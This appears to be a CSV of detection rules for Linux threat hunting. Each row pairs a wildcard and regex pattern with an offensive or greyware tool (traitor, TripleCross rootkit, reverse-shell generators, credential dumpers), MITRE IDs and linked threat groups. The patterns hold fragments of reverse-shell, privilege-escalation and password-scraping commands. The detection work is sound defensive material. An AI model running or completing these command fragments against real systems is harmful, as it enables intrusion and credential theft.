"*/backdoor/traitor.go*",".{0,1000}\/backdoor\/traitor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*/cve*/exploit.go*",".{0,1000}\/cve.{0,1000}\/exploit\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*/exploits/*.go*",".{0,1000}\/exploits\/.{0,1000}\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*sqlite3*/dev/null*'.shell*mkfifo*|""/bin/sh"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""\/bin\/sh\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*sqlite3*/dev/null*'.shell*mkfifo*|""bash"" | nc*'",".{0,1000}sqlite3.{0,1000}\/dev\/null.{0,1000}\'\.shell.{0,1000}mkfifo.{0,1000}\|\""bash\""\s\|\snc.{0,1000}\'","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3080","656","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z"
"*src\pamspy.c*",".{0,1000}src\\pamspy\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*ss -tunlp || netstat -tunlp*127.0.0.1*",".{0,1000}ss\s\-tunlp\s\|\|\snetstat\s\-tunlp.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*SSSDKCMExtractor.py*",".{0,1000}SSSDKCMExtractor\.py.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","#linux","N/A","10","2","138","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z"
"*/gtfobins.go*",".{0,1000}\/gtfobins\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*/internal/pipe/pipe.go*",".{0,1000}\/internal\/pipe\/pipe\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*/payloads/payloads.go*",".{0,1000}\/payloads\/payloads\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*/pkg/state/sudoers.go*",".{0,1000}\/pkg\/state\/sudoers\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*/shell/password.go*",".{0,1000}\/shell\/password\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*|base64 -d > /tmp/traitor*",".{0,1000}\|base64\s\-d\s\>\s\/tmp\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*cmd/backdoor.go*",".{0,1000}cmd\/backdoor\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*cmd/setuid.go*",".{0,1000}cmd\/setuid\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*strace -o /dev/null /bin/sh -p*",".{0,1000}strace\s\-o\s\/dev\/null\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*strings -n * /dev/mem | grep -i pass*",".{0,1000}strings\s\-n\s.{0,1000}\s\/dev\/mem\s\|\sgrep\s\-i\spass.{0,1000}","greyware_tool_keyword","grep","search for passwords in memory and core dumps","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*su ehorus -s /bin/bash -c ""kill -9 -1""*",".{0,1000}su\sehorus\s\-s\s\/bin\/bash\s\-c\s\""kill\s\-9\s\-1\"".{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*go get -u *traitor/cmd/traitor*",".{0,1000}go\sget\s\-u\s.{0,1000}traitor\/cmd\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*liamg/traitor*",".{0,1000}liamg\/traitor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","1","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*traitor -a *",".{0,1000}traitor\s\-a\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*traitor --any *",".{0,1000}traitor\s\-\-any\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*sudo ./dnsstager*",".{0,1000}sudo\s\.\/dnsstager.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","#linux","N/A","10","7","604","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z"
"*sudo ./recv -f *",".{0,1000}sudo\s\.\/recv\s\-f\s.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","#linux","N/A","10","2","137","15","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z"
"*sudo ./teamserver *",".{0,1000}sudo\s\.\/teamserver\s.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","#linux","N/A","10","10","895","199","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z"
"*sudo ./tmate-ssh-server*",".{0,1000}sudo\s\.\/tmate\-ssh\-server.{0,1000}","greyware_tool_keyword","tmate","Instant terminal sharing","T1071 - T1105 - T1573 - T1021","TA0010 - TA0011 - TA0008 - TA0002","N/A","WatchDog","C2","https://github.com/tmate-io/tmate-ssh-server","1","0","#linux","N/A","10","10","630","147","2024-06-21T11:52:24Z","2013-06-09T23:58:55Z"
"*sudo apache2 -f /etc/shadow*",".{0,1000}sudo\sapache2\s\-f\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","sudo","access sensitive files by abusing sudo permissions","T1548.001 - T1059.004","TA0004 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*sudo bloodhound*",".{0,1000}sudo\sbloodhound.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","0","#linux","N/A","10","10","1954","330","2024-07-26T20:07:25Z","2018-02-26T14:44:20Z"
"*sudo iodine *",".{0,1000}sudo\siodine\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6270","509","2024-10-30T09:08:59Z","2012-02-04T19:51:39Z"
"*sudo -l -U dnskire*",".{0,1000}sudo\s\-l\s\-U\sdnskire.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","15","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z"
"*sudo LD_LIBRARY_PATH=. apache2*",".{0,1000}sudo\sLD_LIBRARY_PATH\=\.\sapache2.{0,1000}","greyware_tool_keyword","sudo","abusing LD_LIBRARY_PATH sudo option  to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*sudo LD_PRELOAD=/tmp/preload.so find*",".{0,1000}sudo\sLD_PRELOAD\=\/tmp\/preload\.so\sfind.{0,1000}","greyware_tool_keyword","sudo","abusinf LD_PREDLOAD option to escalade privilege","T1546.009 - T1059.004 - T1548.002","TA0004 - TA0002 - TA0003","N/A","N/A","Privilege Escalation","N/A","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*sudo nps start*",".{0,1000}sudo\snps\sstart.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#linux","N/A","9","10","2360","302","2024-11-21T09:23:24Z","2022-09-14T06:24:00Z"
"*sudo -nS id' && lse_sudo=true*",".{0,1000}sudo\s\-nS\sid\'\s\&\&\slse_sudo\=true.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*traitor -e *",".{0,1000}traitor\s\-e\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*sudo rmmod -r*",".{0,1000}sudo\srmmod\s\-r.{0,1000}","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","#linux","greyware tool - risks of False positive !","7","10","1986","506","2024-12-06T22:33:09Z","2020-06-17T21:48:18Z"
"*sudo -s /bin/bash tactical*",".{0,1000}sudo\s\-s\s\/bin\/bash\stactical.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","#linux","N/A","10","10","3276","450","2024-11-28T19:56:21Z","2019-10-22T22:19:12Z"
"*sudo socat -v TCP-LISTEN:135*rogueOxidResolverPort*",".{0,1000}sudo\ssocat\s\-v\sTCP\-LISTEN\:135.{0,1000}rogueOxidResolverPort.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#linux","N/A","10","10","1341","211","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z"
"*sudo systemctl edit --full cloudflared.service*",".{0,1000}sudo\ssystemctl\sedit\s\-\-full\scloudflared\.service.{0,1000}","greyware_tool_keyword","cloudflared","cloudfared Contains the command-line client for Cloudflare Tunnel - a tunneling daemon that proxies traffic from the Cloudflare network to your origins","T1572 - T1090 - T1071","TA0001 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - Gamaredon - TA4557 - FIN6","C2","https://github.com/cloudflare/cloudflared","1","0","#linux","N/A","10","10","9418","838","2024-12-06T13:05:17Z","2017-10-13T19:54:47Z"
"*sudo tailscale up*",".{0,1000}sudo\stailscale\sup.{0,1000}","greyware_tool_keyword","tailscale","Tailscale connects your team's devices and development environments for easy access to remote resources.","T1021 - T1573 ","TA0005 - TA0001 - TA0010 ","N/A","Scattered Spider*","Defense Evasion","https://github.com/tailscale/tailscale","1","0","#linux","N/A","9","10","19721","1550","2024-12-06T21:22:02Z","2020-01-31T22:00:03Z"
"*sudo tmux new -s icebreaker*",".{0,1000}sudo\stmux\snew\s\-s\sicebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1186","160","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z"
"*sudo_inject*",".{0,1000}sudo_inject.{0,1000}","offensive_tool_keyword","sudo_inject","Privilege Escalation by injecting process possessing sudo tokens Inject process that have valid sudo token and activate our own sudo token","T1055 - T1548.001 - T1059.002","TA0002 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/nongiach/sudo_inject","1","1","#linux","N/A","N/A","8","701","117","2019-04-14T07:43:35Z","2019-03-24T22:06:22Z"
"*traitor --exploit*",".{0,1000}traitor\s\-\-exploit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"*sudoers.d/sshuttle_auto*",".{0,1000}sudoers\.d\/sshuttle_auto.{0,1000}","greyware_tool_keyword","sshuttle","Transparent proxy server that works as a poor man's VPN. Forwards over ssh","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/sshuttle/sshuttle","1","0","#linux","N/A","10","10","11836","732","2024-12-03T20:16:35Z","2014-09-15T04:51:13Z"
"*sudomy.git*",".{0,1000}sudomy\.git.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"
"*traitor -p *",".{0,1000}traitor\s\-p\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6718","578","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z"
"* CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL*",".{0,1000}\sCC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"* received ACK from backdoor*",".{0,1000}\sreceived\sACK\sfrom\sbackdoor.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*./injector -*",".{0,1000}\.\/injector\s\-.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0007 - TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","Discovery","https://github.com/tennc/webshell","1","0","#linux","N/A","9","10","10154","5577","2024-04-08T22:30:44Z","2013-05-23T07:37:56Z"
"*/execve_hijack*",".{0,1000}\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*/injection_lib.so*",".{0,1000}\/injection_lib\.so.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*/src/common/c&c.h*",".{0,1000}\/src\/common\/c\&c\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*taskset 1 /bin/sh -p*",".{0,1000}taskset\s1\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/TFG/src/helpers/execve_hijack*",".{0,1000}\/TFG\/src\/helpers\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*telnet * | /bin/bash | telnet *",".{0,1000}telnet\s.{0,1000}\s\|\s\/bin\/bash\s\|\stelnet\s.{0,1000}","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","#linux","greyware tool - risks of False positive !","N/A","10","61798","14749","2024-12-04T11:10:42Z","2016-10-18T07:29:07Z"
"*/TripleCross.git*",".{0,1000}\/TripleCross\.git.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*TF=*mkfifo * && telnet * 0<*| /bin/sh 1>*",".{0,1000}TF\=.{0,1000}mkfifo\s.{0,1000}\s\&\&\stelnet\s.{0,1000}\s0\<.{0,1000}\|\s\/bin\/sh\s1\>.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z"
"*/TripleCross/apps/*",".{0,1000}\/TripleCross\/apps\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*/TripleCross-0.1.0.zip*",".{0,1000}\/TripleCross\-0\.1\.0\.zip.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
